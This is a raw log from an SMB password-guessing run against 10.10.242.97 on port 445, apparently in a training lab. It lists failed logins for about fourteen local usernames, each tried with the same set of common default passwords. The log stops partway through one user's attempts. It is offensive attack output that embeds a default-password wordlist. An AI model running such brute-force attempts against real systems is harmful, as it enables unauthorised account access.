[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gertrudewil:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gertrudewil:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gertrudewil:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gertrudewil:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gertrudewil:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gertrudewil:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gertrudewil:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gertrudewil:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gertrudewil:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gertrudewil:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gertrudewil:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gertrudewil:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gertrudewil:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gertrudewil:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gertrudewil:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gertrudewil:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gertrudewil:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gertrudewil:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gertrudewil:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gertrudewil:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gertrudewil:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gertrudewil:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gilberttay:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gilberttay:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gilberttay:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gilberttay:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gilberttay:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gilberttay:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gilberttay:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gilberttay:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gilberttay:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gilberttay:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gilberttay:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gilberttay:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gilberttay:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gilberttay:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gilberttay:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gilberttay:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gilberttay:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gilberttay:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gilberttay:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gilberttay:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gilberttay:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gilberttay:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\glendasny:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\glendasny:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\glendasny:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\glendasny:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\glendasny:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\glendasny:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\glendasny:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\glendasny:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\glendasny:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\glendasny:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\glendasny:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\glendasny:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\glendasny:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\glendasny:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\glendasny:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\glendasny:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\glendasny:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\glendasny:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\glendasny:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\glendasny:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\glendasny:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\glendasny:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gordonban:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gordonban:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gordonban:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gordonban:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gordonban:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gordonban:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gordonban:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gordonban:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gordonban:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gordonban:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gordonban:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gordonban:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gordonban:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gordonban:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gordonban:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gordonban:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gordonban:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gordonban:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gordonban:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gordonban:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gordonban:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\gordonban:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\harveyrey:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\harveyrey:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\harveyrey:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\harveyrey:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\harveyrey:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\harveyrey:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\harveyrey:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\harveyrey:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\harveyrey:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\harveyrey:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\harveyrey:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\harveyrey:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\harveyrey:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\harveyrey:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\harveyrey:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\harveyrey:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\harveyrey:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\harveyrey:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\harveyrey:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\harveyrey:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\harveyrey:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\harveyrey:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\heidiwat:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\heidiwat:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\heidiwat:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\heidiwat:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\heidiwat:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\heidiwat:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\heidiwat:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\heidiwat:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\heidiwat:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\heidiwat:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\heidiwat:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\heidiwat:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\heidiwat:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\heidiwat:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\heidiwat:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\heidiwat:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\heidiwat:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\heidiwat:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\heidiwat:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\heidiwat:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\heidiwat:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\heidiwat:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\herminiacol:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\herminiacol:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\herminiacol:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\herminiacol:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\herminiacol:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\herminiacol:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\herminiacol:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\herminiacol:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\herminiacol:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\herminiacol:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\herminiacol:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\herminiacol:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\herminiacol:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\herminiacol:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\herminiacol:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\herminiacol:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\herminiacol:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\herminiacol:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\herminiacol:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\herminiacol:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\herminiacol:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\herminiacol:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hollywel:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hollywel:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hollywel:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hollywel:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hollywel:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hollywel:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hollywel:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hollywel:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hollywel:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hollywel:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hollywel:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hollywel:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hollywel:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hollywel:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hollywel:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hollywel:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hollywel:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hollywel:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hollywel:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hollywel:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hollywel:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hollywel:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hughfos:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hughfos:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hughfos:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hughfos:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hughfos:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hughfos:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hughfos:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hughfos:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hughfos:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hughfos:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hughfos:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hughfos:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hughfos:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hughfos:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hughfos:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hughfos:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hughfos:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hughfos:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hughfos:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hughfos:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hughfos:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\hughfos:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\ivanray:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\ivanray:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\ivanray:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\ivanray:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\ivanray:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\ivanray:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\ivanray:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\ivanray:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\ivanray:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\ivanray:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\ivanray:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\ivanray:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\ivanray:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\ivanray:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\ivanray:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\ivanray:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\ivanray:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\ivanray:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\ivanray:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\ivanray:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\ivanray:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\ivanray:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jamiegra:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jamiegra:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jamiegra:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jamiegra:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jamiegra:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jamiegra:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jamiegra:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jamiegra:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jamiegra:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jamiegra:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jamiegra:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jamiegra:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jamiegra:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jamiegra:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jamiegra:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jamiegra:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jamiegra:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jamiegra:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jamiegra:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jamiegra:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jamiegra:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jamiegra:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\janicekim:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\janicekim:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\janicekim:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\janicekim:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\janicekim:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\janicekim:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\janicekim:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\janicekim:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\janicekim:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\janicekim:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\janicekim:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\janicekim:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\janicekim:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\janicekim:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\janicekim:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\janicekim:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\janicekim:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\janicekim:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\janicekim:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\janicekim:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\janicekim:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\janicekim:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jasonper:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jasonper:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jasonper:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jasonper:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jasonper:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jasonper:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jasonper:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jasonper:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jasonper:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jasonper:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jasonper:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jasonper:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jasonper:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jasonper:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jasonper:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jasonper:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jasonper:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jasonper:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jasonper:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jasonper:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jasonper:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jasonper:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jaydenhun:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jaydenhun:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jaydenhun:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jaydenhun:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jaydenhun:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jaydenhun:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jaydenhun:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jaydenhun:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jaydenhun:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jaydenhun:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jaydenhun:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jaydenhun:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jaydenhun:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jaydenhun:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jaydenhun:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jaydenhun:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jaydenhun:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jaydenhun:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jaydenhun:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jaydenhun:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jaydenhun:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jaydenhun:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jillbec:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jillbec:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jillbec:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jillbec:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jillbec:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jillbec:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jillbec:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jillbec:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jillbec:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jillbec:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jillbec:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jillbec:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jillbec:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jillbec:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jillbec:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jillbec:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jillbec:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jillbec:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jillbec:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jillbec:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jillbec:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jillbec:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmiebar:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmiebar:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmiebar:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmiebar:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmiebar:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmiebar:uploader',
